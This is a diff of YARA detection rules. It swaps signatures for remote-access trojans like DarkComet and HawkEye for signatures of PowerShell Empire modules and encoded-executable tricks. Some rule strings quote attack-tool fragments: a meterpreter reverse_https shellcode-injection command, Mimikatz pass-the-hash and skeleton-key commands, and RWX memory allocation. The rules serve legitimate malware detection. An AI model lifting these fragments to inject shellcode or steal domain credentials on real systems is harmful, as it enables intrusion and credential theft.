-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L186-L206"
+		reference = "https://twitter.com/ESETresearch/status/1503436420886712321?s=20&t=xh8JK6fEmRIrnqO7Ih_PNg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_caddywiper.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9a2fcd11573654f0c91c0c0dec8938ca8319a23953a5043135cb0032562f9f53"
-		score = 75
-		quality = 75
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		logic_hash = "0d0278596010953e7068979c92a33dc0ace1bfa94979077412128d1ca756f834"
+		score = 85
+		quality = 85
+		tags = "FILE"
+		hash1 = "1e87e9b5ee7597bdce796490f3ee09211df48ba1d11f6e2f5b255f05cc0ba176"
+		hash2 = "a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea"
+		hash3 = "ea6a416b320f32261da8dafcf2faf088924f99a3a84f7b43b964637ea87aef72"
+		hash4 = "f1e8844dbfc812d39f369e7670545a29efef6764d673038b1c3edd11561d6902"
 
 	strings:
-		$a = "getVer" nocase
-		$b = "StartVNC" nocase
-		$c = "SendCamList" nocase
-		$d = "untPlugin" nocase
-		$e = "gethostbyname" nocase
+		$op1 = { ff 55 94 8b 45 fc 50 ff 55 f8 8a 4d ba 88 4d ba 8a 55 ba 80 ea 01 }
+		$op2 = { 89 45 f4 83 7d f4 00 74 04 eb 47 eb 45 6a 00 8d 95 1c ff ff ff 52 }
+		$op3 = { 6a 20 6a 02 8d 4d b0 51 ff 95 68 ff ff ff 85 c0 75 0a e9 4e 02 00 00 }
+		$op4 = { e9 67 01 00 00 83 7d f4 05 74 0a e9 5c 01 00 00 e9 57 01 00 00 8d 45 98 50 6a 20 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and 3 of them or all of them
 }
-rule SIGNATURE_BASE_RAT_Clientmesh : TORCT
+rule SIGNATURE_BASE_Empire_Invoke_Bypassuac : FILE
 {
 	meta:
-		description = "Detects ClientMesh RAT"
-		author = "Kevin Breen <kevin@techanarchy.net> (slightly modified by Florian Roth to improve performance)"
-		id = "351df33e-d3a1-5fe8-be38-edb43bc5d38f"
-		date = "2014-01-06"
+		description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-BypassUAC.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8454d929-e184-5be1-b61f-4dfa8f44bdda"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/ClientMesh"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L208-L228"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L9-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "671da9586110726b1646d4365ccaa87982ec7c86b7d4d80b99dbb444496b936c"
-		score = 75
+		hash = "ab0f900a6915b7497313977871a64c3658f3e6f73f11b03d2d33ca61305dc6a8"
+		logic_hash = "1697065405fa0e255cdd77fa39f53866118caf0bad6a3d72756590303610e7b6"
+		score = 70
 		quality = 85
-		tags = "TORCT"
-		family = "torct"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$string1 = "machinedetails"
-		$string2 = "MySettings"
-		$string3 = "sendftppasswords"
-		$string4 = "sendbrowserpasswords"
-		$string5 = "arma2keyMass"
-		$string6 = "keylogger"
+		$s1 = "$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory" fullword ascii
+		$s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii
+		$s3 = "$Payload = Invoke-PatchDll -DllBytes $Payload -FindString \"ExitThread\" -ReplaceString \"ExitProcess\"" fullword ascii
+		$s4 = "$temp = [System.Text.Encoding]::UNICODE.GetBytes($szTempDllPath)" fullword ascii
 
 	condition:
-		all of them
+		filesize < 1200KB and 3 of them
 }
-rule SIGNATURE_BASE_RAT_Cybergate
+rule SIGNATURE_BASE_Empire_Lib_Modules_Trollsploit_Message : FILE
 {
 	meta:
-		description = "Detects CyberGate RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "387e7c89-c766-54cf-aac0-3ba03092bc25"
-		date = "2014-01-04"
+		description = "Empire - a pure PowerShell post-exploitation agent - file message.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cb0eee5a-c236-512e-8256-7411a7fb1fd5"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/CyberGate"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L230-L254"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6b3861ae5e6bd6478e9d8024b0e67a3ac1dbf31083b77477364c55b51d0ed9b5"
-		score = 75
+		hash = "71f2258177eb16eafabb110a9333faab30edacf67cb019d5eab3c12d095655d5"
+		logic_hash = "70b7d91395ae30131c1448511425abf32ddedf04632266454aa008330ff28222"
+		score = 70
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$string1 = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}
-		$string2 = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}
-		$string3 = "EditSvr"
-		$string4 = "TLoader"
-		$string5 = "Stroks"
-		$string6 = "####@####"
-		$res1 = "XX-XX-XX-XX"
-		$res2 = "CG-CG-CG-CG"
+		$s1 = "script += \" -\" + str(option) + \" \\\"\" + str(values['Value'].strip(\"\\\"\")) + \"\\\"\"" fullword ascii
+		$s2 = "if option.lower() != \"agent\" and option.lower() != \"computername\":" fullword ascii
+		$s3 = "[String] $Title = 'ERROR - 0xA801B720'" fullword ascii
+		$s4 = "'Value'         :   'Lost contact with the Domain Controller.'" fullword ascii
 
 	condition:
-		all of ( $string* ) and any of ( $res* )
+		filesize < 10KB and 3 of them
 }
-rule SIGNATURE_BASE_RAT_Darkcomet
+rule SIGNATURE_BASE_Empire_Persistence : FILE
 {
 	meta:
-		description = "Detects DarkComet RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "e6fd0269-dd0c-58c0-a1a3-24c2aed916ee"
-		date = "2014-01-04"
+		description = "Empire - a pure PowerShell post-exploitation agent - file Persistence.psm1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0f63b5f4-f933-5821-b0b0-50717e75f6d9"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/DarkComet"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L256-L282"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L47-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "db139f754f89affc706e090a41bfcd30cf49f9d4e16ade89993ee170f92cf68b"
-		score = 75
+		hash = "ae8875f7fcb8b4de5cf9721a9f5a9f7782f7c436c86422060ecdc5181e31092f"
+		logic_hash = "3c398aa180b6f2225a25f9b1430e89991c7e391930e2be140e89c67da67b3614"
+		score = 70
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "#BOT#URLUpdate"
-		$a2 = "Command successfully executed!"
-		$a3 = "MUTEXNAME" wide
-		$a4 = "NETDATA" wide
-		$b1 = "FastMM Borland Edition"
-		$b2 = "%s, ClassID: %s"
-		$b3 = "I wasn't able to open the hosts file"
-		$b4 = "#BOT#VisitUrl"
-		$b5 = "#KCMDDC"
+		$s1 = "C:\\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -V" ascii
+		$s2 = "# Execute the following to remove the user-level persistent payload" fullword ascii
+		$s3 = "$PersistantScript = $PersistantScript.ToString().Replace('EXECUTEFUNCTION', \"$PersistenceScriptName -Persist\")" fullword ascii
 
 	condition:
-		all of ( $a* ) or all of ( $b* )
+		filesize < 108KB and 1 of them
 }
-rule SIGNATURE_BASE_RAT_Darkrat
+rule SIGNATURE_BASE_Empire_Portscan : FILE
 {
 	meta:
-		description = "Detects DarkRAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "8283236a-6ed1-5213-8386-a029867b9677"
-		date = "2014-01-04"
+		description = "Empire - a pure PowerShell post-exploitation agent - file portscan.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "23a0f769-9155-5aa0-9200-2baf827bdda4"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/DarkRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L284-L306"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L65-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dccb473a3cf4478dd1dbf8b35ad564f59740676ecde90266a0dc15cbad89bfe7"
-		score = 75
+		hash = "b355efa1e7b3681b1402e22c58ce968795ef245fd08a0afb948d45c173e60b97"
+		logic_hash = "162ac4ccc8629a2d017831cdc6d1bf8d7a62b844bf68a0d61956b2f41a5e004b"
+		score = 70
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "@1906dark1996coder@"
-		$b = "SHEmptyRecycleBinA"
-		$c = "mciSendStringA"
-		$d = "add_Shutdown"
-		$e = "get_SaveMySettingsOnExit"
-		$f = "get_SpecialDirectories"
-		$g = "Client.My"
+		$s1 = "script += \"Invoke-PortScan -noProgressMeter -f\"" fullword ascii
+		$s2 = "script += \" | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-Str" ascii
 
 	condition:
-		all of them
+		filesize < 14KB and all of them
 }
-rule SIGNATURE_BASE_RAT_Greame
+rule SIGNATURE_BASE_Empire_Invoke_Shellcode : FILE
 {
 	meta:
-		description = "Detects Greame RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "b90d3747-407a-5552-971f-78ff78f827a6"
-		date = "2014-01-04"
+		description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "41788f71-cc99-50b3-bdc7-17b132ab2767"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Greame"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L308-L331"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L82-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4a1ce5f5847bdc01d286c1d9cd1e16ba2fd6b5bc56e6094cb1492882708e8e59"
-		score = 75
+		hash = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
+		logic_hash = "968a140f75aa17bd9aac243483cade931dc047854b65b2f61146492c2cf01ea5"
+		score = 70
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}
-		$b = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}
-		$c = "EditSvr"
-		$d = "TLoader"
-		$e = "Stroks"
-		$f = "Avenger by NhT"
-		$g = "####@####"
-		$h = "GREAME"
+		$s1 = "C:\\PS> Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 443 -Verbos" ascii
+		$s2 = "\"Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!\" ) )" fullword ascii
+		$s3 = "$RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)" fullword ascii
 
 	condition:
-		all of them
+		filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_RAT_Hawkeye
+rule SIGNATURE_BASE_Empire_Invoke_Mimikatz : FILE
 {
 	meta:
-		description = "Detects HawkEye RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "22b1d1e6-feea-5f84-9564-326ad80bbd8d"
-		date = "2015-01-06"
+		description = "Empire - a pure PowerShell post-exploitation agent - file Invoke-Mimikatz.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f7d6c1c4-2a24-54fd-b745-32d7894affc8"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/HawkEye"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L333-L357"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L100-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "db3a0fe5774f0d137e092a4eb9672a4518d0ef943a1a4619cb646a9ac9f74ee0"
-		score = 75
+		hash = "c5481864b757837ecbc75997fa24978ffde3672b8a144a55478ba9a864a19466"
+		logic_hash = "3e16bed3dd7b36920cdf01507f35e38d004e3ce2f3301911a8ee4aedbae6c5c3"
+		score = 70
 		quality = 85
-		tags = ""
-		maltype = "KeyLogger"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$key = "HawkEyeKeylogger" wide
-		$salt = "099u787978786" wide
-		$string1 = "HawkEye_Keylogger" wide
-		$string2 = "holdermail.txt" wide
-		$string3 = "wallet.dat" wide
-		$string4 = "Keylog Records" wide
-		$string5 = "<!-- do not script -->" wide
-		$string6 = "\\pidloc.txt" wide
-		$string7 = "BSPLIT" wide
+		$s1 = "$PEBytes64 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc" ascii
+		$s2 = "[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)" fullword ascii
+		$s3 = "Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp" fullword ascii
 
 	condition:
-		$key and $salt and all of ( $string* )
+		filesize < 2500KB and 2 of them
 }
-rule SIGNATURE_BASE_RAT_Imminent
+rule SIGNATURE_BASE_Empire_Lib_Modules_Credentials_Mimikatz_Pth : FILE
 {
 	meta:
-		description = "Detects Imminent RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "deddef60-c309-54e0-a488-ce937ed7eae3"
-		date = "2014-01-04"
+		description = "Empire - a pure PowerShell post-exploitation agent - file pth.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f954b7e8-e820-5111-ba8d-a9b9779381b0"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Imminent"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L359-L389"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L118-L133"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aebae753c119950b0b3f315c7279866caf15f4d482c0a47912c90885adcf6db2"
-		score = 75
+		hash = "6dee1cf931e02c5f3dc6889e879cc193325b39e18409dcdaf987b8bf7c459211"
+		logic_hash = "6989c2e50ce642e0300e1293f46cd36e5141274d1e7172a8312595bb515bede2"
+		score = 70
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$v1a = "DecodeProductKey"
-		$v1b = "StartHTTPFlood"
-		$v1c = "CodeKey"
-		$v1d = "MESSAGEBOX"
-		$v1e = "GetFilezillaPasswords"
-		$v1f = "DataIn"
-		$v1g = "UDPzSockets"
-		$v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41}
-		$v2a = "<URL>k__BackingField"
-		$v2b = "<RunHidden>k__BackingField"
-		$v2c = "DownloadAndExecute"
-		$v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide
-		$v2e = "england.png" wide
-		$v2f = "Showed Messagebox" wide
+		$s0 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
+		$s1 = "command = \"sekurlsa::pth /user:\"+self.options[\"user\"]['Value']" fullword ascii
 
 	condition:
-		all of ( $v1* ) or all of ( $v2* )
+		filesize < 12KB and all of them
 }
-rule SIGNATURE_BASE_RAT_Infinity
+rule SIGNATURE_BASE_Empire_Write_Hijackdll : FILE
 {
 	meta:
-		description = "Detects Infinity RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "b70f9459-fa84-516f-841d-d9617856eb4d"
-		date = "2014-01-04"
+		description = "Empire - a pure PowerShell post-exploitation agent - file Write-HijackDll.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6a80af21-fb01-5996-b14d-44ff55b7fb3e"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Infinity"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L391-L414"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L135-L151"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c1f5381755af6cfbb10a4769757cdeffb9651bddc76bc4c8e9765ed44bf37fe6"
-		score = 75
+		hash = "155fa7168e28f15bb34f67344f47234a866e2c63b3303422ff977540623c70bf"
+		logic_hash = "e01157fe4adaf647474292bfbbb8196c0b7e89433da52a386a8d9573ae543679"
+		score = 70
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "CRYPTPROTECT_PROMPTSTRUCT"
-		$b = "discomouse"
-		$c = "GetDeepInfo"
-		$d = "AES_Encrypt"
-		$e = "StartUDPFlood"
-		$f = "BATScripting" wide
-		$g = "FBqINhRdpgnqATxJ.html" wide
-		$i = "magic_key" wide
+		$s1 = "$DllBytes = Invoke-PatchDll -DllBytes $DllBytes -FindString \"debug.bat\" -ReplaceString $BatchPath" fullword ascii
+		$s2 = "$DllBytes32 = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBw" ascii
+		$s3 = "[Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes32)" fullword ascii
 
 	condition:
-		all of them
+		filesize < 500KB and 2 of them
 }
-rule SIGNATURE_BASE_RAT_Lostdoor
+rule SIGNATURE_BASE_Empire_Skeleton_Key : FILE
 {
 	meta:
-		description = "Detects LostDoor RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "f86ae7a1-2182-5b2e-8f9e-9e8456f574bc"
-		date = "2014-01-04"
+		description = "Empire - a pure PowerShell post-exploitation agent - file skeleton_key.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d508e09e-13e8-5866-bb5b-0d886f960bb5"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/LostDoor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L440-L465"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L153-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7ffa6f5cbeacca5a1e750e35d8296658d4e280078a61f94fd5f2d4b7c800bb44"
-		score = 75
+		hash = "3d02f16dcc38faaf5e97e4c5dbddf761f2816004775e6af8826cde9e29bb750f"
+		logic_hash = "910451b2b2ed7cb5f7891d97d15e49da24b182adc903926f539fc4bfe589f2d5"
+		score = 70
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a0 = {0D 0A 2A 45 44 49 54 5F 53 45 52 56 45 52 2A 0D 0A}
-		$a1 = "*mlt* = %"
-		$a2 = "*ip* = %"
-		$a3 = "*victimo* = %"
-		$a4 = "*name* = %"
-		$b5 = "[START]"
-		$b6 = "[DATA]"
-		$b7 = "We Control Your Digital World" wide ascii
-		$b8 = "RC4Initialize" wide ascii
-		$b9 = "RC4Decrypt" wide ascii
+		$s1 = "script += \"Invoke-Mimikatz -Command '\\\"\" + command + \"\\\"';\"" fullword ascii
+		$s2 = "script += '\"Skeleton key implanted. Use password \\'mimikatz\\' for access.\"'" fullword ascii
+		$s3 = "command = \"misc::skeleton\"" fullword ascii
+		$s4 = "\"ONLY APPLICABLE ON DOMAIN CONTROLLERS!\")," fullword ascii
 
 	condition:
-		all of ( $a* ) or all of ( $b* )
+		filesize < 6KB and 2 of them
 }
-rule SIGNATURE_BASE_RAT_Luminositylink
+rule SIGNATURE_BASE_Empire_Invoke_Wmi : FILE
 {
 	meta:
-		description = "Detects LuminosityLink RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "163fe10c-38a1-53d3-b3a5-4240229e0306"
-		date = "2014-01-04"
+		description = "Empire - a pure PowerShell post-exploitation agent - file invoke_wmi.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1e1d1e71-6ea9-500a-b8b8-c48a64bc2b54"
+		date = "2015-08-06"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/LuminosityLink"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L467-L493"
+		reference = "https://github.com/PowerShellEmpire/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_empire.yar#L172-L188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5e70e3e0885d098f1ac2bcc324cd8ad2682fbfc395f189cabc4a4f97a0109682"
-		score = 75
-		quality = 60
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		hash = "a914cb227f652734a91d3d39745ceeacaef7a8b5e89c1beedfd6d5f9b4615a1d"
+		logic_hash = "7179a22eec8eb9e59bf590e671e6849d5b960c58eb8fa591bc3b340d64f1d076"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "SMARTLOGS" wide
-		$b = "RUNPE" wide
-		$c = "b.Resources" wide
-		$d = "CLIENTINFO*" wide
-		$e = "Invalid Webcam Driver Download URL, or Failed to Download File!" wide
-		$f = "Proactive Anti-Malware has been manually activated!" wide
-		$g = "REMOVEGUARD" wide
-		$h = "C0n1f8" wide
-		$i = "Luminosity" wide
-		$j = "LuminosityCryptoMiner" wide
-		$k = "MANAGER*CLIENTDETAILS*" wide
+		$s1 = "(credID, credType, domainName, userName, password, host, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]" fullword ascii
+		$s2 = "script += \";'Invoke-Wmi executed on \" +computerNames +\"'\"" fullword ascii
+		$s3 = "script = \"$PSPassword = \\\"\"+password+\"\\\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Man" ascii
 
 	condition:
-		all of them
+		filesize < 20KB and 2 of them
 }
-rule SIGNATURE_BASE_RAT_Luxnet
+rule SIGNATURE_BASE_Gen_Base64_EXE : HIGHVOL FILE
 {
 	meta:
-		description = "Detects LuxNet RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "277db509-5ba0-5d1b-b17a-d5914f1f1650"
-		date = "2014-01-04"
+		description = "Detects Base64 encoded Executable in Executable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ef919a63-9a29-5624-a084-b92e3578e3a6"
+		date = "2017-04-21"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/LuxNet"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L495-L516"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_cloaking.yar#L71-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "55d872e2e30f6d55a6f91750bbb52675042e4673d712a4f2417af43b0f2c4fb9"
+		logic_hash = "6fe18ee727a836c0baaac4dbbffdb9f50065f56a4c6eeee7e54792a8a66229de"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "HIGHVOL, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "GetHashCode"
-		$b = "Activator"
-		$c = "WebClient"
-		$d = "op_Equality"
-		$e = "dickcursor.cur" wide
-		$f = "{0}|{1}|{2}" wide
+		$s1 = "TVpTAQEAAAAEAAAA//8AALgAAAA" wide ascii
+		$s2 = "TVoAAAAAAAAAAAAAAAAAAAAAAAA" wide ascii
+		$s3 = "TVqAAAEAAAAEABAAAAAAAAAAAAA" wide ascii
+		$s4 = "TVpQAAIAAAAEAA8A//8AALgAAAA" wide ascii
+		$s5 = "TVqQAAMAAAAEAAAA//8AALgAAAA" wide ascii
+		$fp1 = "BAM Management class library"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 1 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_RAT_Netwire
+rule SIGNATURE_BASE_Binary_Drop_Certutil : FILE
 {
 	meta:
-		description = "Detects NetWire RAT"
-		author = "Kevin Breen <kevin@techanarchy.net> & David Cannings"
-		id = "f0077e8c-3e6a-5a98-9171-b0d81f24d27a"
-		date = "2014-01-04"
+		description = "Drop binary as base64 encoded cert trick"
+		author = "Florian Roth (Nextron Systems)"
+		id = "19791e51-d041-524d-80fa-9f3ec54eb084"
+		date = "2015-07-15"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/NetWire"
